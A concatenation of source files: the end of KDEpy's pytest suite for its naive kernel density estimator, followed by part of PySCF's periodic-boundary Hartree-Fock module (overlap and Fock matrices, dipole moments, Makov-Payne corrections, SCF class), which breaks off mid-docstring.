    equals the weighted sum of KDEs fitted on two disjoint splits.
    """
    x = np.linspace(-10, 10)

    # Fit to add data
    y = NaiveKDE().fit(data).evaluate(x)

    # Fit to splits, and compensate for smaller data using weights
    weight_1 = split_index / len(data)
    y_1 = NaiveKDE().fit(data[:split_index]).evaluate(x) * weight_1
    weight_2 = (len(data) - split_index) / len(data)
    y_2 = NaiveKDE().fit(data[split_index:]).evaluate(x) * weight_2

    # Additive property of the functions
    assert np.allclose(y, y_1 + y_2)
@pytest.mark.parametrize("data, split_index", args)
def test_additivity_with_weights(data, split_index):
    """
    The weighted KDE of the full sample equals the sum of KDEs fitted on
    two disjoint splits, each rescaled by its total weight.
    """
    grid = np.linspace(-10, 15)
    # Weights 1, 2, ..., n normalized to sum to one.
    w = np.arange(len(data)) + 1
    w = w / np.sum(w)

    # KDE fitted on the full weighted sample.
    full = NaiveKDE().fit(data, w).evaluate(grid)

    # Split both the sample and its weights at split_index.
    d_left, d_right = list(data)[:split_index], list(data)[split_index:]
    w_left, w_right = list(w)[:split_index], list(w)[split_index:]

    # Rescale each partial KDE by the total weight of its split.
    left = NaiveKDE().fit(d_left, w_left).evaluate(grid) * sum(w_left)
    right = NaiveKDE().fit(d_right, w_right).evaluate(grid) * sum(w_right)

    # Additivity of the density estimates.
    assert np.allclose(full, left + right)
# Reference values generated by R's density() -- see the docstring below.
@pytest.mark.parametrize(
    "kernel, bw, n, expected_result",
    [
        (
            "box",
            0.1,
            5,
            np.array([2.101278e-19, 3.469447e-18, 1.924501e00, 0.000000e00, 9.622504e-01]),
        ),
        (
            "box",
            0.2,
            5,
            np.array([3.854941e-18, 2.929755e-17, 9.622504e-01, 0.000000e00, 4.811252e-01]),
        ),
        ("box", 0.6, 3, np.array([0.1603751, 0.4811252, 0.4811252])),
        ("tri", 0.6, 3, np.array([0.1298519, 0.5098009, 0.3865535])),
        (
            "epa",
            0.1,
            6,
            np.array(
                [
                    0.000000e00,
                    7.285839e-17,
                    2.251871e-01,
                    1.119926e00,
                    0.000000e00,
                    1.118034e00,
                ]
            ),
        ),
        (
            "biweight",
            2,
            5,
            np.array([0.1524078, 0.1655184, 0.1729870, 0.1743973, 0.1696706]),
        ),
    ],
)
def test_against_R_density(kernel, bw, n, expected_result):
    """
    Test against the following function call in R:

        d <- density(c(0, 0.1, 1), kernel="{kernel}", bw={bw},
        n={n}, from=-1, to=1);
        d$y

    I believe R uses FFT, so the results are approximate.
    """
    data = np.array([0, 0.1, 1])
    x = np.linspace(-1, 1, num=n)
    y = NaiveKDE(kernel, bw=bw).fit(data).evaluate(x)
    # Loose tolerance since R's density() uses an FFT-based approximation.
    assert np.allclose(y, expected_result, atol=10 ** (-2.7))
# Reference values generated by scipy.stats.gaussian_kde -- see the
# docstring below.
@pytest.mark.parametrize(
    "bw, n, expected_result",
    [
        (1, 3, np.array([0.17127129, 0.34595518, 0.30233275])),
        (
            0.1,
            5,
            np.array(
                [
                    2.56493684e-22,
                    4.97598466e-06,
                    2.13637668e00,
                    4.56012216e-04,
                    1.32980760e00,
                ]
            ),
        ),
        (0.01, 3, np.array([0.0, 13.29807601, 13.29807601])),
    ],
)
def test_against_scipy_density(bw, n, expected_result):
    """
    Test against the following function call in SciPy:

        data = np.array([0, 0.1, 1])
        x = np.linspace(-1, 1, {n})
        bw = {bw}/np.asarray(data).std(ddof=1)
        density_estimate = gaussian_kde(dataset = data, bw_method = bw)
        y = density_estimate.evaluate(x)

    # Note that scipy weights its bandwidth by the covariance of the
    # input data. To make the results comparable to the other methods,
    # we divide the bandwidth by the sample standard deviation here.
    """
    data = np.array([0, 0.1, 1])
    x = np.linspace(-1, 1, num=n)
    y = NaiveKDE(kernel="gaussian", bw=bw).fit(data).evaluate(x)
    assert np.allclose(y, expected_result)
def test_constant_values_silverman():
    """
    Test that a data set with constant values does not fail when using silverman's rule.

    Tests with "almost" constant values should also get a bw assigned automatically,
    although silverman's rule technically does not do this.

    https://github.com/tommyod/KDEpy/issues/9
    """
    # All-constant data: silverman would give bw = 0; a warning is expected
    # and the bw should fall back to 1.0.
    data = np.ones(100, dtype=float)
    kde = NaiveKDE(bw="silverman")
    with pytest.warns(UserWarning):
        kde.fit(data)
    assert np.isclose(kde.bw, 1.0)

    # Almost-constant data: still warns, but must not crash.
    data = np.ones(1000, dtype=float)
    data[0] = 0.0
    data[999] = 2.0
    kde = NaiveKDE(bw="silverman")
    with pytest.warns(UserWarning):
        kde.fit(data)


if __name__ == "__main__":
    # --durations=10 <- May be used to show potentially slow tests
    pytest.main(args=[".", "--doctest-modules", "-v", "-k constant"])
| tommyod/KDEpy | KDEpy/tests/test_NaiveKDE.py | Python | gpl-3.0 | 5,608 | [
"Gaussian"
] | 40e07fba04724104285a51302864a6a0cca066480356bf79d91bbdfa85ca5255 |
#!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: Garnet Chan <gkc1000@gmail.com>
# Timothy Berkelbach <tim.berkelbach@gmail.com>
# Qiming Sun <osirpt.sun@gmail.com>
#
'''
Hartree-Fock for periodic systems at a single k-point
See Also:
pyscf.pbc.scf.khf.py : Hartree-Fock for periodic systems with k-point sampling
'''
import sys
import numpy as np
import h5py
from pyscf.scf import hf as mol_hf
from pyscf import lib
from pyscf.lib import logger
from pyscf.data import nist
from pyscf.pbc import gto
from pyscf.pbc import tools
from pyscf.pbc.gto import ecp
from pyscf.pbc.gto.pseudo import get_pp
from pyscf.pbc.scf import chkfile # noqa
from pyscf.pbc.scf import addons
from pyscf.pbc import df
from pyscf.pbc.scf.rsjk import RangeSeparationJKBuilder
from pyscf.pbc.lib.kpts_helper import gamma_point
from pyscf import __config__
def get_ovlp(cell, kpt=np.zeros(3)):
    '''Get the overlap AO matrix.
    '''
    # Avoid pbcopt's prescreening in the lattice sum, for better accuracy
    s = cell.pbc_intor('int1e_ovlp', hermi=0, kpts=kpt,
                       pbcopt=lib.c_null_ptr())
    s = lib.asarray(s)
    # Sanity check: the overlap matrix must be hermitian.  A large deviation
    # signals truncated lattice sums (rcut) or insufficient precision.
    hermi_error = abs(s - np.rollaxis(s.conj(), -1, -2)).max()
    if hermi_error > cell.precision and hermi_error > 1e-12:
        # bug fix: the '%.4g' placeholder had no corresponding argument, so
        # the logger's msg % args formatting would fail; pass hermi_error.
        logger.warn(cell, '%.4g error found in overlap integrals. '
                    'cell.precision or cell.rcut can be adjusted to '
                    'improve accuracy.', hermi_error)

    # Warn if the overlap matrix is nearly singular (linearly dependent AO
    # basis) and suggest settings that would restore accuracy.
    cond = np.max(lib.cond(s))
    if cond * cell.precision > 1e2:
        prec = 1e2 / cond
        rmin = max([cell.bas_rcut(ib, prec) for ib in range(cell.nbas)])
        if cell.rcut < rmin:
            logger.warn(cell, 'Singularity detected in overlap matrix. '
                        'Integral accuracy may be not enough.\n      '
                        'You can adjust  cell.precision  or  cell.rcut  to '
                        'improve accuracy.  Recommended values are\n      '
                        'cell.precision = %.2g  or smaller.\n      '
                        'cell.rcut = %.4g  or larger.', prec, rmin)
    return s
def get_hcore(cell, kpt=np.zeros(3)):
    '''Get the core Hamiltonian AO matrix.

    The core Hamiltonian is the kinetic energy plus either the
    pseudopotential (when the cell defines one) or the bare nuclear
    attraction, plus ECP integrals when ECP basis functions are present.
    '''
    h = get_t(cell, kpt)
    if cell.pseudo:
        h = h + get_pp(cell, kpt)
    else:
        h = h + get_nuc(cell, kpt)
    if len(cell._ecpbas) > 0:
        h = h + ecp.ecp_int(cell, kpt)
    return h
def get_t(cell, kpt=np.zeros(3)):
    '''Get the kinetic energy AO matrix.
    '''
    # Lattice-summed kinetic integrals at the given k-point.
    return cell.pbc_intor('int1e_kin', hermi=1, kpts=kpt)
def get_nuc(cell, kpt=np.zeros(3)):
    '''Get the bare periodic nuc-el AO matrix, with G=0 removed.

    See Martin (12.16)-(12.21).
    '''
    # Delegates to the FFT-based density fitting implementation.
    return df.FFTDF(cell).get_nuc(kpt)
def get_j(cell, dm, hermi=1, vhfopt=None, kpt=np.zeros(3), kpts_band=None):
    '''Get the Coulomb (J) AO matrix for the given density matrix.

    Args:
        dm : ndarray or list of ndarrays
            A density matrix or a list of density matrices

    Kwargs:
        hermi : int
            Whether J, K matrix is hermitian
            | 0 : no hermitian or symmetric
            | 1 : hermitian
            | 2 : anti-hermitian
        vhfopt :
            A class which holds precomputed quantities to optimize the
            computation of J, K matrices
        kpt : (3,) ndarray
            The "inner" dummy k-point at which the DM was evaluated (or
            sampled).
        kpts_band : (3,) ndarray or (*,3) ndarray
            An arbitrary "band" k-point at which J is evaluated.

    Returns:
        The function returns one J matrix, corresponding to the input
        density matrix (both order and shape).
    '''
    # with_k=False: only the Coulomb matrix is computed here.
    return df.FFTDF(cell).get_jk(dm, hermi, kpt, kpts_band, with_k=False)[0]
def get_jk(mf, cell, dm, hermi=1, vhfopt=None, kpt=np.zeros(3),
           kpts_band=None, with_j=True, with_k=True, omega=None, **kwargs):
    '''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.

    Args:
        dm : ndarray or list of ndarrays
            A density matrix or a list of density matrices

    Kwargs:
        hermi : int
            Whether J, K matrix is hermitian
            | 0 : no hermitian or symmetric
            | 1 : hermitian
            | 2 : anti-hermitian
        vhfopt :
            A class which holds precomputed quantities to optimize the
            computation of J, K matrices
        kpt : (3,) ndarray
            The "inner" dummy k-point at which the DM was evaluated (or
            sampled).
        kpts_band : (3,) ndarray or (*,3) ndarray
            An arbitrary "band" k-point at which J and K are evaluated.

    Returns:
        The function returns one J and one K matrix, corresponding to the input
        density matrix (both order and shape).
    '''
    # The exchange divergence treatment (mf.exxdiv) is forwarded so K is
    # consistent with the mean-field object's convention.
    return df.FFTDF(cell).get_jk(dm, hermi, kpt, kpts_band, with_j, with_k,
                                 omega, exxdiv=mf.exxdiv)
def get_bands(mf, kpts_band, cell=None, dm=None, kpt=None):
    '''Get energy bands at the given (arbitrary) 'band' k-points.

    Returns:
        mo_energy : (nmo,) ndarray or a list of (nmo,) ndarray
            Bands energies E_n(k)
        mo_coeff : (nao, nmo) ndarray or a list of (nao,nmo) ndarray
            Band orbitals psi_n(k)
    '''
    if cell is None: cell = mf.cell
    if dm is None: dm = mf.make_rdm1()
    if kpt is None: kpt = mf.kpt

    # Accept a single k-point or a list; remember which so the return
    # value can match the input shape.
    kpts_band = np.asarray(kpts_band)
    single_kpt_band = (getattr(kpts_band, 'ndim', None) == 1)
    kpts_band = kpts_band.reshape(-1,3)

    # Build the Fock matrix at each band k-point from the converged density.
    fock = mf.get_hcore(cell, kpts_band)
    fock = fock + mf.get_veff(cell, dm, kpt=kpt, kpts_band=kpts_band)
    s1e = mf.get_ovlp(cell, kpts_band)
    nkpts = len(kpts_band)
    mo_energy = []
    mo_coeff = []
    # Solve the generalized eigenvalue problem F C = S C E at each k-point.
    for k in range(nkpts):
        e, c = mf.eig(fock[k], s1e[k])
        mo_energy.append(e)
        mo_coeff.append(c)

    if single_kpt_band:
        mo_energy = mo_energy[0]
        mo_coeff = mo_coeff[0]
    return mo_energy, mo_coeff
def init_guess_by_chkfile(cell, chkfile_name, project=None, kpt=None):
    '''Read the HF results from checkpoint file, then project it to the
    basis defined by ``cell``

    Returns:
        Density matrix, (nao,nao) ndarray
    '''
    from pyscf.pbc.scf import uhf
    # The UHF reader returns (alpha, beta); sum them for the RHF total
    # density matrix.
    dm = uhf.init_guess_by_chkfile(cell, chkfile_name, project, kpt)
    return dm[0] + dm[1]
# These molecular-SCF helpers work unchanged for the single k-point PBC
# case; re-export them from the molecular HF module.
get_fock = mol_hf.get_fock
get_occ = mol_hf.get_occ
get_grad = mol_hf.get_grad
make_rdm1 = mol_hf.make_rdm1
energy_elec = mol_hf.energy_elec
def dip_moment(cell, dm, unit='Debye', verbose=logger.NOTE,
               grids=None, rho=None, kpt=np.zeros(3), origin=None):
    ''' Dipole moment in the unit cell (is it well defined)?

    Args:
         cell : an instance of :class:`Cell`

         dm (ndarray) : density matrix

    Return:
        A list: the dipole moment on x, y and z components
    '''
    from pyscf.pbc import tools
    from pyscf.pbc.dft import gen_grid
    from pyscf.pbc.dft import numint
    if cell.dimension != 3:
        # raise NotImplementedError
        logger.warn(cell, 'Dipole moment for low-dimension system is not supported.')
        return np.zeros(3)

    log = logger.new_logger(cell, verbose)
    a = cell.lattice_vectors()
    b = np.linalg.inv(a).T
    if grids is None:
        grids = gen_grid.UniformGrids(cell)
        #? FIXME: Less requirements on the density accuracy.
        #ke_cutoff = gto.estimate_ke_cutoff(cell, 1e-5)
        #grids.mesh = tools.cutoff_to_mesh(a, ke_cutoff)
    if rho is None:
        # Real-space electron density on the grid.
        rho = numint.NumInt().get_rho(cell, dm, grids, kpt, cell.max_memory)
    if origin is None:
        # Choose a gauge origin where nuclear and electronic charge centers
        # coincide, to make the (otherwise gauge-dependent) dipole sensible.
        origin = _search_dipole_gauge_origin(cell, grids, rho, log)

    # Move the unit cell to the position around the origin.
    def shift_grids(r):
        r_frac = lib.dot(r - origin, b.T)
        # Grids on the boundary (r_frac == +/-0.5) of the new cell may lead to
        # unbalanced contributions to the dipole moment. Exclude them from the
        # dipole and quadrupole
        r_frac[r_frac== 0.5] = 0
        r_frac[r_frac==-0.5] = 0
        r_frac[r_frac > 0.5] -= 1
        r_frac[r_frac <-0.5] += 1
        r = lib.dot(r_frac, a)
        return r

    # Electronic and nuclear contributions in the shifted cell.
    r = shift_grids(grids.coords)
    e_dip = np.einsum('g,g,gx->x', rho, grids.weights, r)
    charges = cell.atom_charges()
    r = shift_grids(cell.atom_coords())
    nuc_dip = np.einsum('g,gx->x', charges, r)
    dip = nuc_dip - e_dip

    if unit.upper() == 'DEBYE':
        dip *= nist.AU2DEBYE
        log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *dip)
    else:
        log.note('Dipole moment(X, Y, Z, A.U.): %8.5f, %8.5f, %8.5f', *dip)
    return dip
def _search_dipole_gauge_origin(cell, grids, rho, log):
    '''Optimize the position of the unit cell in crystal. With a proper unit
    cell, the nuclear charge center and the electron density center are at the
    same point. This function returns the origin of such unit cell.
    '''
    from pyscf.pbc.dft import gen_grid
    a = cell.lattice_vectors()
    b = np.linalg.inv(a).T
    charges = cell.atom_charges()
    coords = cell.atom_coords()
    # Initial guess: the nuclear charge center.
    origin = np.einsum('i,ix->x', charges, coords) / charges.sum()
    log.debug1('Initial guess of origin center %s', origin)
    nelec = np.dot(rho, grids.weights)

    # The dipole moment in the crystal is not uniquely defined. Depending on
    # the position and the shape of the unit cell, the value of dipole moment
    # can be very different. The optimization below searches the boundary of
    # cell inside which the nuclear charge center and electron density charge
    # center locate at the same point. The gauge origin will be chosen at the
    # center of unit cell.
    if (cell.dimension == 3 and
        # For orthogonal lattice only
        # bug fix: the guard used abs(np.diag(a.diagonal())).max(), which is
        # truthy for any valid lattice; test that the off-diagonal lattice
        # components vanish, as the comment above intends.
        abs(a - np.diag(a.diagonal())).max() < 1e-9 and
        isinstance(grids, gen_grid.UniformGrids)):
        gridxyz = grids.coords.T.reshape(3, *grids.mesh)
        gridbase = (gridxyz[0,:,0,0], gridxyz[1,0,:,0], gridxyz[2,0,0,:])
        wxyz = grids.weights.reshape(grids.mesh)
        rhoxyz = rho.reshape(grids.mesh)

        def search_orig(ix, origin):
            # Optimize the origin along lattice direction ix (0, 1 or 2)
            # so that the dipole component along that axis vanishes.
            nx = grids.mesh[ix]
            Lx = a[ix,ix]
            # Wrap grid coordinates into the cell centered at `origin`,
            # dropping points exactly on the boundary (unbalanced pairs).
            g = gridbase[ix] - origin
            g_frac = (g * b[ix,ix]).round(6)
            g[g_frac == .5] = 0
            g[g_frac ==-.5] = 0
            g[g_frac > .5] -= Lx
            g[g_frac < -.5] += Lx
            # 1D electron density profile along axis ix (normalized).
            meanx = np.einsum('xyz,xyz->'+('xyz'[ix]), rhoxyz, wxyz) / nelec
            ex = meanx * g

            # Same wrapping for the nuclear coordinates.
            r_nuc = coords[:,ix] - origin
            r_frac = (r_nuc * b[ix,ix]).round(6)
            r_nuc[r_frac == .5] = 0
            r_nuc[r_frac ==-.5] = 0
            r_nuc[r_frac > .5] -= Lx
            r_nuc[r_frac < -.5] += Lx
            nuc_dip = np.dot(charges, r_nuc) / charges.sum()

            # ex.sum() ~ electron dipole wrt the given origin
            dipx = nuc_dip - ex.sum()

            # Density profile reordered to match the wrapped coordinates.
            g = gridbase[ix] - origin
            sorted_meanx = np.hstack((meanx[g >= Lx/2],
                                      meanx[(g < Lx/2) & (g >= -Lx/2)],
                                      meanx[g < -Lx/2]))
            if abs(dipx) < 1e-3:
                offx = 0
            elif dipx > 0:
                # To cancel the positive dipole, move electrons to the right side
                rcum_dip = np.append(0, np.cumsum(sorted_meanx * Lx))
                idx = np.where(rcum_dip > dipx)[0][0]
                dx = (rcum_dip[idx] - dipx) / (rcum_dip[idx] - rcum_dip[idx-1])
                offx = (idx - dx) * Lx/nx
            else:
                # To cancel the negative dipole, move electrons to the left side
                lcum_dip = np.append(0, np.cumsum(sorted_meanx[::-1] * Lx))
                idx = np.where(lcum_dip > -dipx)[0][0]
                dx = (lcum_dip[idx] - -dipx) / (lcum_dip[idx] - lcum_dip[idx-1])
                offx = -(idx - dx) * Lx/nx
            return origin + offx

        wbar = grids.weights[0]**(1./3)
        for i in range(4):
            # bug fix: origin is mutated in place below, so aliasing it
            # (orig_last = origin) made the convergence test always 0 and
            # the loop exit after one iteration; take a copy instead.
            orig_last = origin.copy()
            origin[0] = search_orig(0, origin[0])
            origin[1] = search_orig(1, origin[1])
            origin[2] = search_orig(2, origin[2])
            if abs(origin - orig_last).max() < wbar:
                break
            log.debug1('iter %d: origin %s', i, origin)
    else:
        # If the grids are non-cubic grids, regenerating the grids is expensive if
        # the position or the shape of the unit cell is changed. The position of
        # the unit cell is not optimized. The gauge origin is set to the nuclear
        # charge center of the original unit cell.
        pass
    return origin
def get_rho(mf, dm=None, grids=None, kpt=None):
    '''Compute the electron density on a real-space grid.

    Args:
        mf : PBC mean-field object; supplies defaults for dm, grids and kpt.
        dm : density matrix.  A spin-resolved (UHF-style) stack of matrices
            is collapsed to the total (spin-summed) density matrix.
        grids : real-space integration grids; defaults to uniform grids of
            the underlying cell.
        kpt : k-point at which the density is evaluated.

    Returns:
        1D array of density values, one per grid point.
    '''
    from pyscf.pbc.dft import gen_grid, numint

    if dm is None:
        dm = mf.make_rdm1()
    # A UHF-style (alpha, beta) stack has ndim != 2; sum the spin channels.
    if getattr(dm, 'ndim', None) != 2:
        dm = dm[0] + dm[1]
    if grids is None:
        grids = gen_grid.UniformGrids(mf.cell)
    if kpt is None:
        kpt = mf.kpt
    return numint.NumInt().get_rho(mf.cell, dm, grids, kpt, mf.max_memory)
def _dip_correction(mf):
    '''Makov-Payne corrections for charged systems.

    Returns a 4-tuple ``(de_mono, de_dip, de_quad, de)``.  ``de_mono`` (and
    therefore ``de``) is an ndarray over the three tabulated Madelung
    constants (SC, BCC, FCC); the dipole and quadrupole terms are scalars.
    '''
    from pyscf.pbc import tools
    from pyscf.pbc.dft import gen_grid
    log = logger.new_logger(mf)
    cell = mf.cell
    a = cell.lattice_vectors()
    # b.T is the inverse lattice matrix: used to map Cartesian -> fractional.
    b = np.linalg.inv(a).T
    grids = gen_grid.UniformGrids(cell)
    ke_cutoff = gto.estimate_ke_cutoff(cell, 1e-5)
    grids.mesh = tools.cutoff_to_mesh(a, ke_cutoff)
    dm = mf.make_rdm1()
    rho = mf.get_rho(dm, grids, mf.kpt)
    # Gauge origin chosen so the dipole is evaluated in a cell centered on it.
    origin = _search_dipole_gauge_origin(cell, grids, rho, log)

    def shift_grids(r):
        # Wrap Cartesian coordinates into the cell centered at `origin`.
        r_frac = lib.dot(r - origin, b.T)
        # Grids on the boundary (r_frac == +/-0.5) of the new cell may lead to
        # unbalanced contributions to the dipole moment. Exclude them from the
        # dipole and quadrupole
        r_frac[r_frac == 0.5] = 0
        r_frac[r_frac == -0.5] = 0
        r_frac[r_frac > 0.5] -= 1
        r_frac[r_frac < -0.5] += 1
        r = lib.dot(r_frac, a)
        return r

    #           SC              BCC             FCC
    madelung = (-2.83729747948, -3.63923344951, -4.58486207411)
    vol = cell.vol
    L = vol ** (1./3)
    chg = cell.charge
    # epsilon is the dielectric constant of the system. For systems
    # surrounded by vacuum, epsilon = 1.
    epsilon = 1
    # Energy correction of point charges of a simple cubic lattice.
    de_mono = - chg**2 * np.array(madelung) / (2 * L * epsilon)

    # dipole energy correction
    r_e = shift_grids(grids.coords)
    r_nuc = shift_grids(cell.atom_coords())
    charges = cell.atom_charges()
    e_dip = np.einsum('g,g,gx->x', rho, grids.weights, r_e)
    nuc_dip = np.einsum('g,gx->x', charges, r_nuc)
    dip = nuc_dip - e_dip
    de_dip = -2.*np.pi/(3*cell.vol) * np.linalg.norm(dip)**2

    # quadrupole energy correction
    if abs(a - np.eye(3)*L).max() > 1e-5:
        logger.warn(mf, 'System is not cubic cell. Quadrupole energy '
                    'correction is inaccurate since it is developed based on '
                    'cubic cell.')
    e_quad = np.einsum('g,g,gx,gx->', rho, grids.weights, r_e, r_e)
    nuc_quad = np.einsum('g,gx,gx->', charges, r_nuc, r_nuc)
    quad = nuc_quad - e_quad
    de_quad = 2.*np.pi/(3*cell.vol) * quad

    de = de_mono + de_dip + de_quad
    return de_mono, de_dip, de_quad, de
def makov_payne_correction(mf):
    '''Makov-Payne correction (Phys. Rev. B, 51, 4014)

    Computes the monopole, dipole and quadrupole energy corrections for a
    charged 3D periodic system and, at NOTE verbosity, prints them for the
    SC, BCC and FCC Madelung constants.

    Args:
        mf : a PBC mean-field object (must expose .cell, .verbose, .stdout).

    Returns:
        Total correction ``de`` (ndarray over SC/BCC/FCC), or 0 when the
        cell is not 3-dimensional (correction not available).
    '''
    cell = mf.cell
    logger.note(mf, 'Makov-Payne correction for charged 3D PBC systems')
    # PRB 51 (1995), 4014
    # PRB 77 (2008), 115139
    if cell.dimension != 3:
        # Fix: the implicit string concatenation was missing a space and
        # rendered as "...systemsis not available."
        logger.warn(mf, 'Correction for low-dimension PBC systems '
                    'is not available.')
        return 0

    de_mono, de_dip, de_quad, de = _dip_correction(mf)
    if mf.verbose >= logger.NOTE:
        write = mf.stdout.write
        write('Corrections (AU)\n')
        write(' Monopole Dipole Quadrupole total\n')
        write('SC %12.8f %12.8f %12.8f %12.8f\n' %
              (de_mono[0], de_dip, de_quad, de[0]))
        write('BCC %12.8f %12.8f %12.8f %12.8f\n' %
              (de_mono[1], de_dip, de_quad, de[1]))
        write('FCC %12.8f %12.8f %12.8f %12.8f\n' %
              (de_mono[2], de_dip, de_quad, de[2]))
    return de
class SCF(mol_hf.SCF):
    '''SCF base class adapted for PBCs.

    Attributes:
        kpt : (3,) ndarray
            The AO k-point in Cartesian coordinates, in units of 1/Bohr.

        exxdiv : str
            Exchange divergence treatment, can be one of

            | None : ignore G=0 contribution in exchange
            | 'ewald' : Ewald probe charge correction [JCP 122, 234102 (2005); DOI:10.1063/1.1926272]

        with_df : density fitting object
            Default is the FFT based DF model. For all-electron calculation,
            MDF model is favored for better accuracy. See also :mod:`pyscf.pbc.df`.

        direct_scf : bool
            When this flag is set to true, the J/K matrices will be computed
            directly through the underlying with_df methods. Otherwise,
            depending on the available memory, the 4-index integrals may be cached
            and J/K matrices are computed based on the 4-index integrals.
    '''
    direct_scf = getattr(__config__, 'pbc_scf_SCF_direct_scf', False)

    def __init__(self, cell, kpt=np.zeros(3),
                 exxdiv=getattr(__config__, 'pbc_scf_SCF_exxdiv', 'ewald')):
        if not cell._built:
            sys.stderr.write('Warning: cell.build() is not called in input\n')
            cell.build()
        self.cell = cell
        mol_hf.SCF.__init__(self, cell)
        self.with_df = df.FFTDF(cell)
        # Range separation JK builder
        self.rsjk = None
        self.exxdiv = exxdiv
        # The kpt setter stores the k-point on self.with_df (see property below).
        self.kpt = kpt
        self.conv_tol = cell.precision * 10
        self._keys = self._keys.union(['cell', 'exxdiv', 'with_df', 'rsjk'])

    @property
    def kpt(self):
        # The k-point is stored on self.with_df; a plain instance attribute
        # 'kpt' may appear when an object is restored from a chkfile.
        if 'kpt' in self.__dict__:
            # To handle the attribute kpt loaded from chkfile
            self.kpt = self.__dict__.pop('kpt')
        return self.with_df.kpts.reshape(3)

    @kpt.setter
    def kpt(self, x):
        self.with_df.kpts = np.reshape(x, (-1, 3))
        # Keep the range-separated JK builder (if any) in sync.
        if self.rsjk:
            self.rsjk.kpts = self.with_df.kpts

    def build(self, cell=None):
        if 'kpt' in self.__dict__:
            # To handle the attribute kpt loaded from chkfile
            self.kpt = self.__dict__.pop('kpt')

        if self.rsjk:
            # Rebuild the RS-JK builder if its k-points differ from ours.
            if not np.all(self.rsjk.kpts == self.kpt):
                self.rsjk = self.rsjk.__class__(cell, self.kpt.reshape(1, 3))
            self.rsjk.build(direct_scf_tol=self.direct_scf_tol)

        if self.verbose >= logger.WARN:
            self.check_sanity()
        return self

    def reset(self, cell=None):
        '''Reset cell and relevant attributes associated to the old cell object'''
        if cell is not None:
            self.cell = cell
            self.mol = cell  # used by hf kernel
        self.with_df.reset(cell)
        return self

    def dump_flags(self, verbose=None):
        mol_hf.SCF.dump_flags(self, verbose)
        logger.info(self, '******** PBC SCF flags ********')
        logger.info(self, 'kpt = %s', self.kpt)
        logger.info(self, 'Exchange divergence treatment (exxdiv) = %s', self.exxdiv)
        cell = self.cell
        if ((cell.dimension >= 2 and cell.low_dim_ft_type != 'inf_vacuum') and
                isinstance(self.exxdiv, str) and self.exxdiv.lower() == 'ewald'):
            madelung = tools.pbc.madelung(cell, [self.kpt])
            logger.info(self, ' madelung (= occupied orbital energy shift) = %s', madelung)
            logger.info(self, ' Total energy shift due to Ewald probe charge'
                        ' = -1/2 * Nelec*madelung = %.12g',
                        madelung*cell.nelectron * -.5)
        logger.info(self, 'DF object = %s', self.with_df)
        if not getattr(self.with_df, 'build', None):
            # .dump_flags() is called in pbc.df.build function
            self.with_df.dump_flags(verbose)
        return self

    def check_sanity(self):
        mol_hf.SCF.check_sanity(self)
        self.with_df.check_sanity()
        # Only the Ewald treatment is supported by the (M)DF builders.
        if (isinstance(self.exxdiv, str) and self.exxdiv.lower() != 'ewald' and
                isinstance(self.with_df, df.df.DF)):
            logger.warn(self, 'exxdiv %s is not supported in DF or MDF',
                        self.exxdiv)
        return self

    def get_hcore(self, cell=None, kpt=None):
        # Core Hamiltonian: nuclear attraction (or pseudopotential) + kinetic.
        if cell is None: cell = self.cell
        if kpt is None: kpt = self.kpt
        if cell.pseudo:
            nuc = self.with_df.get_pp(kpt)
        else:
            nuc = self.with_df.get_nuc(kpt)
        if len(cell._ecpbas) > 0:
            nuc += ecp.ecp_int(cell, kpt)
        return nuc + cell.pbc_intor('int1e_kin', 1, 1, kpt)

    def get_ovlp(self, cell=None, kpt=None):
        if cell is None: cell = self.cell
        if kpt is None: kpt = self.kpt
        return get_ovlp(cell, kpt)

    def get_jk(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
               with_j=True, with_k=True, omega=None, **kwargs):
        r'''Get Coulomb (J) and exchange (K) following :func:`scf.hf.RHF.get_jk_`.
        for particular k-point (kpt).

        When kpts_band is given, the J, K matrices on kpts_band are evaluated.

            J_{pq} = \sum_{rs} (pq|rs) dm[s,r]
            K_{pq} = \sum_{rs} (pr|sq) dm[r,s]

        where r,s are orbitals on kpt. p and q are orbitals on kpts_band
        if kpts_band is given otherwise p and q are orbitals on kpt.
        '''
        if cell is None: cell = self.cell
        if dm is None: dm = self.make_rdm1()
        if kpt is None: kpt = self.kpt

        cpu0 = (logger.process_clock(), logger.perf_counter())
        dm = np.asarray(dm)
        nao = dm.shape[-1]

        # Incore path: contract cached 4-index AO integrals when allowed
        # (no range separation, no band k-points, enough memory).
        if (not omega and kpts_band is None and
            # TODO: generate AO integrals with rsjk algorithm
            not self.rsjk and
            (self.exxdiv == 'ewald' or not self.exxdiv) and
            (self._eri is not None or cell.incore_anyway or
             (not self.direct_scf and self._is_mem_enough()))):
            if self._eri is None:
                logger.debug(self, 'Building PBC AO integrals incore')
                self._eri = self.with_df.get_ao_eri(kpt, compact=True)
            vj, vk = mol_hf.dot_eri_dm(self._eri, dm, hermi, with_j, with_k)

            if with_k and self.exxdiv == 'ewald':
                from pyscf.pbc.df.df_jk import _ewald_exxdiv_for_G0
                # G=0 is not included in the ._eri integrals
                _ewald_exxdiv_for_G0(self.cell, kpt, dm.reshape(-1, nao, nao),
                                     vk.reshape(-1, nao, nao))
        elif self.rsjk:
            vj, vk = self.rsjk.get_jk(dm.reshape(-1, nao, nao), hermi, kpt, kpts_band,
                                      with_j, with_k, omega, exxdiv=self.exxdiv)
        else:
            vj, vk = self.with_df.get_jk(dm.reshape(-1, nao, nao), hermi, kpt, kpts_band,
                                         with_j, with_k, omega, exxdiv=self.exxdiv)

        if with_j:
            vj = _format_jks(vj, dm, kpts_band)
        if with_k:
            vk = _format_jks(vk, dm, kpts_band)
        logger.timer(self, 'vj and vk', *cpu0)
        return vj, vk

    def get_j(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
              omega=None):
        r'''Compute J matrix for the given density matrix and k-point (kpt).
        When kpts_band is given, the J matrices on kpts_band are evaluated.

            J_{pq} = \sum_{rs} (pq|rs) dm[s,r]

